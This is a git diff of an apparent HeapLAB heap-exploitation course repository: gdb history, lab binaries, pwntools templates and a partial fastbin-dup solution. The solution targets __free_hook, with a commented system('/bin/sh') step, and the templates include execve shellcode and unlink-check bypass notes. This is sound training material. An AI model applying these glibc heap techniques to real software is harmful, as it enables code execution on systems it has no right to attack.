+db 0x7f0ba6e3db70 - 8
+db 0x7f0ba6e3db70-8
+db 0x7f0ba6e3db70-7
+q
+x 0x7fcf882cbb69
+db 0x7fcf882cbb69
+q
+vis_heap_chunks 
+print main_arena
+q
+print main_arena
+vis_heap_chunks 
+q
+print main_arena 
+q
+print main_arena 
+fastbins
+r
+q
+r
+c
+fastbisn
+vis_heap_chunks 
+fastbins
+quit
+fastbins
+print main_arena 
+c
+print main_arena 
+q
+print main_arena 
+print main_arena 
+x malloc_free_hook
+x __free_hook
+x &__free_hook
+x &__free_hook 100
+db &__free_hook 100
+q
+q
+q
+q
+print main_arena 
+db 0x7f4858584e10
+c
+print victim
+q
+fastbins
+c
+x idx
+x chunksize(p)
+x chunksize
+x p
+fastbins
+q
+x __free_hook 
+x &__free_hook 100
+db &__free_hook 100
+db &__free_hook - 100
+db &__free_hook-100
+db &__free_hook-100 100
+print main_arena 
+x 0x7fca0f75fe10
+x/100 0x7fca0f75fe10
+x/100 0x7fca0f75fe10-100
+c
+q
+break malloc
+c
+fastbins
+x __free_hook 
+fastins
+fastbins
+print main_arena 
+x 0x7f072b59ee10
+break malloc
+break free
+continue
+c
+c
+c
+print main_arena
+vis_heap_chunks 
+vis_heap_chunks 
+c
+vis_heap_chunks 
+break free
+break malloc
+c
+print main_arena
+x &__free_hook - 16
+q
+print main_arena
+vis_heap_chunks 
+c
+c
+c
+q
+db __malloc_hook
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+c
+break sysmalloc
+c
+frame 2
+context
+c
+break main
+c
+q
+x &__malloc_hook
+print __malloc_hook
+print &__malloc_hook
+print __main_arena
+print main_arena
+print main_arena 
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100 (100*8)+1
+fastbins
+c
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook-100 (100*8)+1
+c
+db &__malloc_hook-100 (100*8)+1
+print main_arena
+x 0x7f5b07a18b40
+break malloc
+c
+c
+c
+q
+break __libc_malloc 
+break malloc
+break __malloc_hook
+b __malloc_hook 
+b &__malloc_hook 
+b *__malloc_hook 
+b *&__malloc_hook 
+c
+delete 3
+c
+pwndbg heap
+vis_heap_chunks 
+print __mallinfo
+x __mallinfo
+print  &__mallinfo
+print  *__mallinfo
+print  __mallinfo
+print &__mallinfo
+print main_arena
+c
+break malloc
+c
+x main_arena.top_check
+x main_arena.top_chunk
+print main_arena
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+fastbins
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
+x &main_arena
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
+q
+print __malloc_hook
+print __malloc_hook 
+fastbins
+c
+fastbins
+c
+vis_heap_chunks 
+c
+fastbins
+r
+c
+fastbins
+print main_arena
+vis_heap
+c
+fastbins
+fastbins
+c
+fastbins
+r
+c
+ quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
new file mode 100755
index 0000000..191cbea
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+context.terminal = ['kitty', 'bash', '-c']
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+#13 chunks
+
+chunk1 = malloc(24, 'abcd')
+chunk2 = malloc(24, 'abcc')
+
+free(chunk1)
+free(chunk2)
+free(chunk1)
+
+#malloc(24, p64(libc.sym.main_arena + 96))
+# This sets up a fake size field in the fastbins.
+malloc(24, p64(0x81))
+malloc(24, 'asdf')
+malloc(24, 'asdf')
+
+chunk_b1 = malloc(119, 'asdf')
+chunk_b2 = malloc(119, 'asdf')
+
+free(chunk_b1)
+free(chunk_b2)
+free(chunk_b1)
+
+fake_chunk_loc = libc.sym.main_arena + 8 # beginning of the fastbin array
+
+malloc(119, p64(fake_chunk_loc))
+malloc(119, 'asdf')
+malloc(119, 'sdfg')
+
+# Padding: 9 qwords (8 * 9 = 72 bytes) before the planted pointer.
+
+malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+
+print(hex(fake_chunk_loc)) 
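+
+# Hedged sketch of a possible continuation (not part of the original script):
+# the nine zeroed qwords above appear to pad through the remaining fastbin
+# slots so that __free_hook - 16 lands deeper in main_arena's metadata. If a
+# follow-up request can then be steered on top of __free_hook, something along
+# these lines would finish the job:
+#
+#   malloc(24, p64(libc.sym.system))     # overwrite __free_hook with system()
+#   free(malloc(24, b"/bin/sh\0"))       # free("/bin/sh") now calls system("/bin/sh")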
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
new file mode 100755
index 0000000..faa0249
Binary files /dev/null and b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 differ
diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..1faaaf8
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+#gs = '''
+#continue
+#'''
+gs = '''
+break main
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request two 0x50-sized chunks.
+chunk_A = malloc(0x48, "A"*8)
+chunk_B = malloc(0x48, "B"*8)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-one_byte/one_byte b/HeapLAB/challenge-one_byte/one_byte
new file mode 100755
index 0000000..696030a
Binary files /dev/null and b/HeapLAB/challenge-one_byte/one_byte differ
diff --git a/HeapLAB/challenge-one_byte/pwntools_template.py b/HeapLAB/challenge-one_byte/pwntools_template.py
new file mode 100755
index 0000000..d49da15
--- /dev/null
+++ b/HeapLAB/challenge-one_byte/pwntools_template.py
@@ -0,0 +1,80 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("one_byte")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option.
+# Returns chunk index.
+def malloc():
+    global index
+    io.sendthen("> ", "1")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "read" option; read 0x58 bytes.
+def read(index):
+    io.send("4")
+    io.sendafter("index: ", f"{index}")
+    r = io.recv(0x58)
+    io.recvuntil("> ")
+    return r
+
+io = start()
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request a chunk.
+chunk_A = malloc()
+
+# Edit chunk A.
+edit(chunk_A, b"Y"*32)
+
+# Read data from chunk A.
+data = read(chunk_A)
+log.info(f"Read from chunk_A:\n{data}")
+
+# Free chunk A.
+free(chunk_A)
+
+# Because you haven't leaked a libc address yet, libc.sym.<symbol name>
+# will only print a symbol's offset, rather than its actual address.
+log.info(f"offset of puts() from start of GLIBC shared object: 0x{libc.sym.puts:02x}")
+
+# Once you've leaked an address, e.g. that of the printf() function, use:
+# libc.address = <leaked printf address> - libc.sym.printf
+# to set your libc base to its runtime load address. Future calls to
+# libc.sym will then return each symbol's actual address rather than its offset.
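+#
+# For example, if read() happened to leak a pointer into printf() in its first
+# 8 bytes (a hypothetical leak source, just to illustrate the pattern):
+#
+#   leak = u64(read(chunk_A)[:8])
+#   libc.address = leak - libc.sym.printf
+#   log.info(f"libc @ 0x{libc.address:02x}")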
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/fastbin_dup/demo b/HeapLAB/fastbin_dup/demo
new file mode 100755
index 0000000..93847ad
Binary files /dev/null and b/HeapLAB/fastbin_dup/demo differ
diff --git a/HeapLAB/fastbin_dup/fastbin_dup b/HeapLAB/fastbin_dup/fastbin_dup
new file mode 100755
index 0000000..7332ab1
Binary files /dev/null and b/HeapLAB/fastbin_dup/fastbin_dup differ
diff --git a/HeapLAB/fastbin_dup/pwntools_template.py b/HeapLAB/fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..294ab15
--- /dev/null
+++ b/HeapLAB/fastbin_dup/pwntools_template.py
@@ -0,0 +1,62 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Set the username field.
+username = "George"
+io.sendafter("username: ", username)
+io.recvuntil("> ")
+
+# Request two 0x30-sized chunks and fill them with data.
+chunk_A = malloc(0x28, "A"*0x28)
+chunk_B = malloc(0x28, "B"*0x28)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
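+
+# Hedged note (not from the original template): freeing the same chunk twice in
+# a row (e.g. free(chunk_B) again now) would trip glibc's "double free or
+# corruption (fasttop)" check, which only compares the chunk being freed against
+# the current fastbin head. Because free(chunk_B) put chunk_B at the head,
+# freeing chunk_A a second time slips past that check (assuming these chunks are
+# going to a fastbin rather than the tcache) -- the classic fastbin dup:
+#
+#   free(chunk_A)
+#   free(chunk_B)
+#   free(chunk_A)   # chunk_A is no longer the head, so the check passes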
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/house_of_force/demo b/HeapLAB/house_of_force/demo
new file mode 100755
index 0000000..1384ebd
Binary files /dev/null and b/HeapLAB/house_of_force/demo differ
diff --git a/HeapLAB/house_of_force/house_of_force b/HeapLAB/house_of_force/house_of_force
new file mode 100755
index 0000000..5cdd95f
Binary files /dev/null and b/HeapLAB/house_of_force/house_of_force differ
diff --git a/HeapLAB/house_of_force/pwntools_template.py b/HeapLAB/house_of_force/pwntools_template.py
new file mode 100755
index 0000000..22d980b
--- /dev/null
+++ b/HeapLAB/house_of_force/pwntools_template.py
@@ -0,0 +1,58 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("house_of_force")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Select the "malloc" option, send size & data.
+def malloc(size, data):
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Calculate the "wraparound" distance between two addresses.
+def delta(x, y):
+    return (0xffffffffffffffff - x) + y
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# The "heap" variable holds the heap start address.
+log.info(f"heap: 0x{heap:02x}")
+
+# Program symbols are available via "elf.sym.<symbol name>".
+log.info(f"target: 0x{elf.sym.target:02x}")
+
+# The malloc() function chooses option 1 from the menu.
+# Its arguments are "size" and "data".
+malloc(24, b"Y"*24)
+
+# The delta() function finds the "wraparound" distance between two addresses.
+log.info(f"delta between heap & main(): 0x{delta(heap, elf.sym.main):02x}")
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/house_of_orange/house_of_orange b/HeapLAB/house_of_orange/house_of_orange
new file mode 100755
index 0000000..467a19e
Binary files /dev/null and b/HeapLAB/house_of_orange/house_of_orange differ
diff --git a/HeapLAB/house_of_orange/pwntools_template.py b/HeapLAB/house_of_orange/pwntools_template.py
new file mode 100755
index 0000000..60dc183
--- /dev/null
+++ b/HeapLAB/house_of_orange/pwntools_template.py
@@ -0,0 +1,61 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("house_of_orange")
+libc = elf.libc
+
+gs = '''
+set breakpoint pending on
+break _IO_flush_all_lockp
+enable breakpoints once 1
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Select the "malloc (small)" option.
+def small_malloc():
+    io.send("1")
+    io.recvuntil("> ")
+
+# Select the "malloc (large)" option.
+def large_malloc():
+    io.sendthen("> ", "2")
+
+# Select the "edit (1st small chunk)" option; send data.
+def edit(data):
+    io.send("3")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request a small chunk.
+small_malloc()
+
+# Edit the 1st small chunk.
+edit(b"Y"*24)
+
+# Request a large chunk.
+large_malloc()
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/malloc_testbed/.links/ld.so.2 b/HeapLAB/malloc_testbed/.links/ld.so.2
new file mode 120000
index 0000000..d9768f8
--- /dev/null
+++ b/HeapLAB/malloc_testbed/.links/ld.so.2
@@ -0,0 +1 @@
+../../.glibc/glibc_2.27/ld.so.2
\ No newline at end of file
diff --git a/HeapLAB/malloc_testbed/.links/libc.so.6 b/HeapLAB/malloc_testbed/.links/libc.so.6
new file mode 120000
index 0000000..2635a93
--- /dev/null
+++ b/HeapLAB/malloc_testbed/.links/libc.so.6
@@ -0,0 +1 @@
+../../.glibc/glibc_2.27/libc.so.6
\ No newline at end of file
diff --git a/HeapLAB/malloc_testbed/change_glibc_version.py b/HeapLAB/malloc_testbed/change_glibc_version.py
new file mode 100755
index 0000000..2ce1abc
--- /dev/null
+++ b/HeapLAB/malloc_testbed/change_glibc_version.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python3
+import os
+
+# Grab available GLIBC versions.
+available_versions = []
+for item in os.scandir("../.glibc"):
+    if item.is_dir():
+        available_versions.append(item)
+available_versions.sort(key=lambda x:x.name)
+
+# Print menu.
+print("\n--------------------")
+print("Select GLIBC version")
+print("--------------------")
+for c, version in enumerate(available_versions):
+    print(f"{c:02}) " + version.name)
+
+# Process input.
+choice = int(input("> "))
+if choice < len(available_versions):
+    # Remove old symlinks.
+    try:
+        os.unlink(".links/libc.so.6")
+        os.unlink(".links/ld.so.2")
+    except FileNotFoundError:
+        print("No old links to remove")
+
+    # Replace symlinks.
+    os.symlink("../" + available_versions[choice].path + "/libc.so.6", ".links/libc.so.6")
+    os.symlink("../" + available_versions[choice].path + "/ld.so.2", ".links/ld.so.2")
diff --git a/HeapLAB/malloc_testbed/malloc_testbed b/HeapLAB/malloc_testbed/malloc_testbed
new file mode 100755
index 0000000..3dad712
Binary files /dev/null and b/HeapLAB/malloc_testbed/malloc_testbed differ
diff --git a/HeapLAB/malloc_testbed/pwntools_template.py b/HeapLAB/malloc_testbed/pwntools_template.py
new file mode 100755
index 0000000..2d6f220
--- /dev/null
+++ b/HeapLAB/malloc_testbed/pwntools_template.py
@@ -0,0 +1,97 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("malloc_testbed")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Return chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+# Select the "free address" option; send address.
+def free_address(address):
+    io.send("3")
+    io.sendafter("address: ", f"{address}")
+    io.recvuntil("> ")
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("4")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "read" option; send index.
+# Return data from read operation.
+def read(index):
+    io.send("5")
+    io.sendafter("index: ", f"{index}")
+    r = io.recvuntil("\n1) malloc", drop=True)
+    io.recvuntil("> ")
+    return r
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+
+# This binary leaks the address of its m_array.
+io.recvuntil("m_array @ ")
+m_array = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Log some useful addresses.
+log.info(f"libc is at 0x{libc.address:02x}")
+log.info(f"heap is at 0x{heap:02x}")
+log.info(f"m_array is at 0x{m_array:02x}")
+
+# Request 2 chunks.
+chunk_A = malloc(0x88)
+chunk_B = malloc(0x18)
+
+# Free "chunk_A".
+free(chunk_A)
+
+# Edit "chunk_B".
+edit(chunk_B, "Y"*8)
+
+# Read data from "chunk_B".
+log.info(f"reading chunk_B: {read(chunk_B)[:8]}")
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/safe_unlink/pwntools_template.py b/HeapLAB/safe_unlink/pwntools_template.py
new file mode 100755
index 0000000..ff1c1b2
--- /dev/null
+++ b/HeapLAB/safe_unlink/pwntools_template.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("safe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Print the address of m_array, where the program stores pointers to its allocated chunks.
+log.info(f"m_array @ 0x{elf.sym.m_array:02x}")
+
+# Request 2 small chunks.
+chunk_A = malloc(0x88)
+chunk_B = malloc(0x88)
+
+# Prepare fake chunk metadata.
+fd = 0xdeadbeef
+bk = 0xcafebabe
+prev_size = 0x90
+fake_size = 0x90
+edit(chunk_A, p64(fd) + p64(bk) + p8(0)*0x70 + p64(prev_size) + p64(fake_size))
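+
+# Hedged note (not from the original template): glibc's "corrupted double-linked
+# list" check requires fd->bk == P and bk->fd == P before unlinking chunk P. A
+# classic way to satisfy it is to aim fd and bk back at the m_array slot that
+# holds chunk_A, e.g. (sketch):
+#
+#   fd = elf.sym.m_array - 0x18
+#   bk = elf.sym.m_array - 0x10
+#
+# so that *(fd + 0x18) and *(bk + 0x10) both resolve to the fake chunk's address.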
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/safe_unlink/safe_unlink b/HeapLAB/safe_unlink/safe_unlink
new file mode 100755
index 0000000..83b07b1
Binary files /dev/null and b/HeapLAB/safe_unlink/safe_unlink differ
diff --git a/HeapLAB/unsafe_unlink/demo b/HeapLAB/unsafe_unlink/demo
new file mode 100755
index 0000000..201b741
Binary files /dev/null and b/HeapLAB/unsafe_unlink/demo differ
diff --git a/HeapLAB/unsafe_unlink/pwntools_template.py b/HeapLAB/unsafe_unlink/pwntools_template.py
new file mode 100755
index 0000000..8dd9d69
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/pwntools_template.py
@@ -0,0 +1,72 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("unsafe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
+shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
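+
+# Hedged note (not from the original template): the short jmp (2 bytes) plus
+# 0x16 nops should skip the first 0x18 bytes of this buffer, which is where the
+# unlink operation will scribble a pointer, so execution lands cleanly on the
+# execve shellcode afterwards.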
+
+# Request a small chunk.
+small_chunk = malloc(0x88)
+
+# Edit the small chunk.
+edit(small_chunk, "X"*32)
+
+# Free the small chunk.
+free(small_chunk)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/unsafe_unlink/unsafe_unlink b/HeapLAB/unsafe_unlink/unsafe_unlink
new file mode 100755
index 0000000..190fe07
Binary files /dev/null and b/HeapLAB/unsafe_unlink/unsafe_unlink differ
diff --git a/original.gz b/original.gz
new file mode 100644
index 0000000..5335e54
Binary files /dev/null and b/original.gz differ